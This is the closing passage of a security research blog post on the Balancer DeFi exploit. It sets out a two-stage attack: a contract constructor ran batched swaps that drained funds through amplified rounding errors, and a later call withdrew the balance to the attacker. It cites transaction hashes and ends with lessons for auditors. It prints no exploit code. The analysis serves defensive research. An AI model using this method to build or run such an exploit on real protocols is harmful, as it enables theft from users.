Transaction `0xd155207…` confirms this withdrawal transferred 6,586 WETH from the exploit contract’s internal balance to Exploiter 2 address.

The TwoStage Attack

Stage 1 – Theft (Constructor Execution):

TX: 0x6ed07db1a9fe5c0794d44cd36081d6a6df103fab868cdd75d581e3bd23bc9742

Action: Deploy exploit contract

Method: Constructor executes batchSwap operations against two pools

Result: $63M drained via rounding error, stored in contract’s internal balance

Evidence: 65 fee transfers + InternalBalanceChanged events showing +6,586 WETH, +6,851 osETH, +4,259 wstETH

Stage 2 – Extraction (Function Call):

TX: 0xd155207261712c35fa3d472ed1e51bfcd816e616dd4f517fa5959836f5b48569

Action: Call function 0x8a4f75d6

Method: Withdraw internal balance to Exploiter 2

Result: Funds transferred to final recipient

Evidence: manageUserBalance with sender = exploit contract

Conclusion

The Balancer exploit demonstrates how mathematical vulnerabilities in DeFi protocols can be weaponized through automation and careful parameter tuning. The attacker’s success stemmed from recognizing that negligible rounding errors become exploitable when amplified through dozens of operations in atomic transactions.

Despite extensive audits, the vulnerability persisted because traditional testing focuses on individual operation correctness, not cumulative effects of adversarial batch operations. The industry must evolve toward continuous security validation, economic attack modeling, and adversarial testing that considers how tiny flaws compound into catastrophic exploits.

The post How an Attacker Drained $128M from Balancer Through Rounding Error Exploitation appeared first on Check Point Research.

❌